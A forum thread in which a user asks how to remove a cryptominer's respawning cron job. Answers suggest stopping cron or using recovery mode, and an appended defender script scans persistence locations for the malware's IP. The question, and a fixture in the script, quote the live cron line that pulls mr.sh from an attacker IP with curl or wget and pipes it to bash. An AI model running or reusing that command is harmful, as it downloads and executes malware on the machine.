Hello everyone, my machine has been hijacked by a bitcoin miner. He has a cron job that runs every 2 seconds. Using crontab -e to delete it doesn't work because it respawns soon after. I can't edit it with either nano or vi because each time I try, he has some code running that kills either editor as soon as I open it. Below is his cron job:

*/30 * * * *    (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh

The job is being run from /tmp, but the originating file keeps changing. Any ideas on how to fix this, please? Thanks.

2 Answers

You could disconnect from the internet, stop cron

sudo /etc/init.d/crond stop

and then edit the cronjob.

MaxGyver

This is hard to answer precisely without more knowledge of the offending script, but a general tip is to reboot your system into single-user mode or recovery mode, which disables most daemons and gives you a root prompt to resolve the issues.

This wiki entry from Ubuntu explains the procedure in Ubuntu. For your problem, the most attractive feature of recovery mode is that it mounts the filesystem read-only. That means you will be able to search for the offending code before it is able to propagate and hide anywhere. When you have found the problem, remount in read-write mode and purge it from the system.

pusillanimous
  • How would you know that the cronjob is the only thing modified on the system? – Kusalananda Jun 24 '19 at 09:57
  • Of course, you won't. But I interpreted the original question to imply that the miner script has not escalated privileges – it just runs a script as the user, in the user's crontab. If so, this procedure would work. Obviously, there might also be other kinds of infections going on. Either way it's advisable to begin the troubleshooting with removing the known offender, and see if that fixes it. – pusillanimous Jun 24 '19 at 10:03
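A defender-side script that carries out the procedure in this answer, added here as an example and not part of the thread: with cron stopped (or the root filesystem mounted read-only from recovery mode and its mount point passed as the first argument), it lists every common persistence location that references the indicator from the question and writes a copy of each hit with the offending lines commented out, leaving the originals untouched as evidence. The paths scanned, the function names and the fake filesystem tree it builds for the demo are assumptions, not from the original post.

```shell
#!/bin/sh
# Added example, not part of the original thread. Run with cron stopped and the
# network unplugged, or against a root filesystem mounted read-only from recovery
# mode (pass its mount point as the first argument). It only reports and writes
# cleaned copies; nothing is deleted, so the originals remain as evidence.

IOC="192.210.175.103"   # indicator taken from the cron line in the question

# Print every file under common persistence locations that references $IOC.
find_persistence() {
    root="${1:-/}"; ioc="${2:-$IOC}"
    for rel in etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily \
               var/spool/cron etc/rc.local etc/systemd/system \
               root/.bashrc root/.profile home; do
        p="$root/$rel"
        if [ -e "$p" ]; then grep -rIl -- "$ioc" "$p" 2>/dev/null || true; fi
    done | sort -u
}

# Write <file>.clean with every offending line commented out; print its path.
neutralize_copy() {
    file="$1"; ioc="${2:-$IOC}"
    sed "s|.*$ioc.*|# DISABLED: &|" "$file" > "$file.clean" && echo "$file.clean"
}

# Constructed fixture (a fake filesystem tree, not a real host) for offline trials.
build_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/var/spool/cron/crontabs" "$d/etc/cron.d"
    printf '%s\n' \
      '*/30 * * * *    (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh' \
      > "$d/var/spool/cron/crontabs/victim"
    printf '%s\n' '17 * * * * root cd / && run-parts --report /etc/cron.hourly' \
      > "$d/etc/cron.d/hourly"
    echo "$d"
}

demo() {
    fx=$(build_fixture)
    for f in $(find_persistence "$fx"); do
        echo "hit: $f"
        c=$(neutralize_copy "$f")
        echo "active (non-comment) lines left in $c: $(grep -vc '^#' "$c" || true)"
    done
    rm -rf "$fx"
}
demo
```

On a real host, replace the fixture with the mounted root (for example `find_persistence /mnt`) and review each `.clean` copy before swapping it in after the read-write remount.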